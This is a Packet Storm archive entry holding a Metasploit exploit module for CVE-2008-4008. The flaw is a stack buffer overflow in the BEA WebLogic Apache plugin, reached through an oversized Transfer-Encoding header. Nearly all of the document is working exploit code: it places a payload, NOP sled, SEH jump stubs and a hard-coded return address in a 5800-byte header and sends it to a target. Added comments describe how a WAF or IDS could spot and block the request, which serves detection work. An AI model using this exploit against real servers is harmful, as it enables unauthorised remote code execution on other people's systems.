BEA Weblogic Transfer-Encoding Buffer Overflow

2009-11-26T00:00:00
ID PACKETSTORM:83221
Type packetstorm
Reporter Pusscat
Modified 2009-11-26T00:00:00

Description

                                        
##
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
# Metasploit module for CVE-2008-4008 / OSVDB 49283: a stack-based buffer
# overflow in the BEA WebLogic Apache plugin, triggered through its error
# reporting for unrecognised Transfer-Encoding header values (vendor advisory
# URL is listed under References below).
#
# Defensive view of what this code produces on the wire: one HTTP POST whose
# Transfer-Encoding header value is 5800 bytes of alphanumerics instead of a
# short token such as "chunked", sent with a fixed "Host: localhost" header.
# Either property is far outside normal traffic, so a reverse proxy, WAF or
# IDS rule that bounds header length or rejects non-token Transfer-Encoding
# values in front of the plugin blocks the request before it reaches the
# vulnerable code.
class Metasploit3 < Msf::Exploit::Remote

  # Tcp supplies the connect / sock / disconnect calls used in #exploit.
  include Msf::Exploit::Remote::Tcp
  # SEH mixin; the module's default EXITFUNC is 'seh' (see DefaultOptions).
  include Msf::Exploit::Remote::Seh

  # Registers module metadata, payload constraints, the single target and the
  # RPORT option (default 80).
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in the BEA
        Weblogic Apache plugin. This vulnerability exists in the
        error reporting for unknown Transfer-Encoding headers.
        You may have to run this twice due to timing issues with handlers.
      },
      'Author' => 'pusscat',
      'References' =>
        [
          [ 'CVE', '2008-4008' ],
          [ 'OSVDB', '49283' ],
          [ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged' => true,
      'Platform' => 'win',
      'Payload' =>
        {
          # Payload must fit in the first 500 bytes of the buffer built in #exploit.
          'Space' => 500,
          # NUL, CR and LF are excluded because the buffer is embedded in an
          # HTTP header line; CR/LF would terminate the header early.
          'BadChars' => "\x00\x0d\x0a",
          'StackAdjustment' => -1500,
        },
      'Targets' =>
        [
          [ 'Windows Apache 2.2 version Universal',
            {
              # Hard-coded return address supplied by the author.
              'Ret' => 0x1001f4d6, #pop/pop/ret
            }
          ],
        ],
      'DisclosureDate' => 'Sept 09 2008',
      'DefaultTarget' => 0))
    register_options( [ Opt::RPORT(80) ], self.class )
  end

  # Builds the oversized Transfer-Encoding value and sends it in a single
  # POST request. The buffer layout (payload at offset 0, SEH material at
  # fixed offsets near the end) comes from the author's analysis; the offsets
  # are not derived anywhere in this module.
  def exploit
    # 5800 bytes of random alphanumerics, generated without the payload's bad
    # characters so the header line stays intact.
    sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars)
    # Offset 5781: 4-byte short-jump stub followed by the target's return
    # address in little-endian form (pack 'V').
    sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V')
    # Offset 5789: 5-byte near-jump stub pointing back toward the start of
    # the buffer, where the NOP lead-in and payload were placed.
    sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
    # Overwrite the head of the buffer with 7 NOPs followed by the encoded payload.
    sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded

    # Note the fixed "Host: localhost" header: it does not track RHOST, which
    # makes the request easy to distinguish from legitimate client traffic.
    request =
      "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " +
      sploit +
      "\r\n\r\n"

    # The payload handler is started before the request goes out; the module
    # description notes that handler timing can require a second run.
    handler
    connect
    # Single write; no response is read before the socket is closed.
    sock.put(request);

    disconnect
  end

end
  